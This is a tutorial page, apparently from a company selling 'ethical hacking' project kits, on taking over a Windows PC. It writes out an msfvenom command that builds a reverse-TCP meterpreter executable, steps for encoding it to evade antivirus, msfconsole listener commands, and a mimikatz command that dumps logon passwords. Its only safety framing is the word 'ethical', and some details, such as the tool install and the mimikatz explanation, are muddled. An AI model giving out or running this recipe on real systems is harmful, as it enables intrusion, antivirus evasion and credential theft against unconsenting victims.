Can windows be hacked? The answer is yes. There are many methods by which windows can be hacked! One of them is the payload method. In this ethical hacking project, you will learn to hack windows using the payload method.
# Kali Linux
Ethical Hacking Kit will be shipped to you and you can learn and build using tutorials. You can start for free today!
Let's Start :
We need Metasploit in kali Linux to create a payload.
What is Metasploit?
It is a framework mostly used by hackers to set up the listener to manipulate the machines. We will use this framework in Kali Linux to create a payload for windows.
Creating a malicious executable Exe file:
To create a malicious file, we will use msf venom,
With these commands we create a malicious exe file:
Want to develop practical skills on Ethical Hacking? Checkout our latest projects and start learning for free
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/pj.exe
(you can use any name .exe)
This above command instructs the msf venom to generate an executable file that implements the reverse tcp connection for payload.
Here LHOST is the IP address of our machine.
LPORT is a port to listen to the connection from the target.
(if you want to know your ip address just type ifconfig in the terminal)
Now the payload is ready but now we have to bypass the antivirus, we’ll encode it to make it undetectable.
Making it undetectable :
To encode our file we use the shelter, shelter changes the signature of the file to new and unique. But as we know the antivirus also scans the behavior of the payload file. it scans the file 7-10 times. So that is why we are using the shelter to whole encode the file. Also note that while encoding the payload file disables the automatic submission, otherwise it can be detected by the antivirus.
So to install shelter in Kali Linux, run the commands :
Sudo apt-get install shelter
After running this command the shelter will initialize, so select ‘Y’ yes when it asks to !!
After the installation it will ask you, to enter the payload either in listed or custom. Choose the listed as ‘L’.
After that select the index position, choose Meterpreter_Reverse_TCP.
After that, it will ask you for the LHOST and LPORT, after entering these requirements hit enter.
Then it will run the completion.
Wait for some time, it will provide you an undetectable .exe payload file.
Msf console :
Now, we need to set up the listener on the port.
So type msfconsole in the Kali Linux terminal.
Now use these commands :
# use multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST (your ip)
# set LPORT 4444
After entering these commands in the terminal, TCP handler starts to wait for the connection.
Now execute the payload in the windows.
After executing the payload in the pc or windows system, then we will receive the meterpreter session on our Kali Linux terminal.
But it will show access denied in the terminal. So we will check the id by running the getuid command in the terminal, it will tell you the user id.
To show the user lacks privileges: run this command
mimikatz_command -f sekurlsa::logonPasswords
So you will get access to the pc. Somehow if you are not able to gain access then you need to do UAC bypassing.
Skyfi Labs helps students learn practical skills by building real-world projects.
You can enrol with friends and receive kits at your doorstep
You can learn from experts, build working projects, showcase skills to the world and grab the best jobs.
Get started today!
Stay up-to-date and build projects on latest technologies